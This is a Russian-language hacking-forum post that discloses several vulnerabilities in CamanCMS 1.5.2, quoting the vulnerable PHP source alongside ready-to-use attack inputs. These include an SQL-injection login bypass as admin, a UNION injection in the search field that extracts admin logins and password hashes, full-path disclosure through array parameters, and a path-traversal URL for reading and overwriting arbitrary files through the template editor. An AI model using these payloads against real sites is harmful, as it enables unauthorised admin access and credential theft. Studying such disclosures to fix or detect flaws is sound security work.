RDot - CamanCMS

RDot (https://rdot.org/forum/index.php)

- Сценарии/CMF/СMS (https://rdot.org/forum/forumdisplay.php?f=15)

- - CamanCMS (https://rdot.org/forum/showthread.php?t=1210)

CamanCMS

sql-inj (Заходим под админом)
login.php

PHP код:


		
			
// ...

if($_GET["do"] == "login")

    {

    $login = htmlspecialchars($_POST["login"]); 

    $password = md5(htmlspecialchars($_POST["password"])); 

        

        $query_user = @mysql_query("SELECT * FROM ".$pref."users WHERE login='".$login."' AND password='".$password."' LIMIT 1");

// ...

Код:

Login: admin' -- 

Password: любой

sql-inj
search.php

PHP код:


		
			
// ...

$search = htmlspecialchars($_POST["search"]);



$query_search = @mysql_query("SELECT * FROM ".$pref."news WHERE short_news LIKE '%$search%' OR full_news LIKE '%$search%'"); 

// ...

Код:

В поле поиска вводим: ' union select 1,2,concat_ws(0x3b,login,password),4,5,6,7,8 from users where admin=1--

Раскрытие путей
Из-за htmlspecialchars в search.php (код выше)

Код:

http://localhost/search/

POST: search[]

Код:

И в login.php

POST:login[]

Произвольное чтение файлов и запись информации в файлы
version: CamanCMS 1.5.2
Need:
admin account

admin/template.php

PHP код:


		
			
if(!$_GET["shab"]) {$file_edit = "main.tpl";}

else {$file_edit = $_GET["shab"];}

//...

$file_name = '../template/'.$file_edit.'';

$r = @fopen($file_name,'r');

$text = @fread($r,filesize($file_name));

//...

<form action="edit_template.php?shab={$file_edit}" method="post">

<textarea style="height: 600px; width: 99%;" name="template">{$text}</textarea><br>

<input type="submit" value="Изменить шаблон">

</form>

admin/edit_template.php

PHP код:


		
			
//...

$file_name = "../template/".$_GET["shab"]."";

$text = $_POST["template"];

$text = @stripcslashes($text);

$w=@fopen($file_name,'w');

@fwrite($w,$text);

Эксплуатация:

Код:

http://localhost/caman/admin/template.php?shab=../.htaccess

Cкачать можно тут: http://www.script-php.ru/cms_sistemy_upravleniya_saytom/1286-camancms-152.html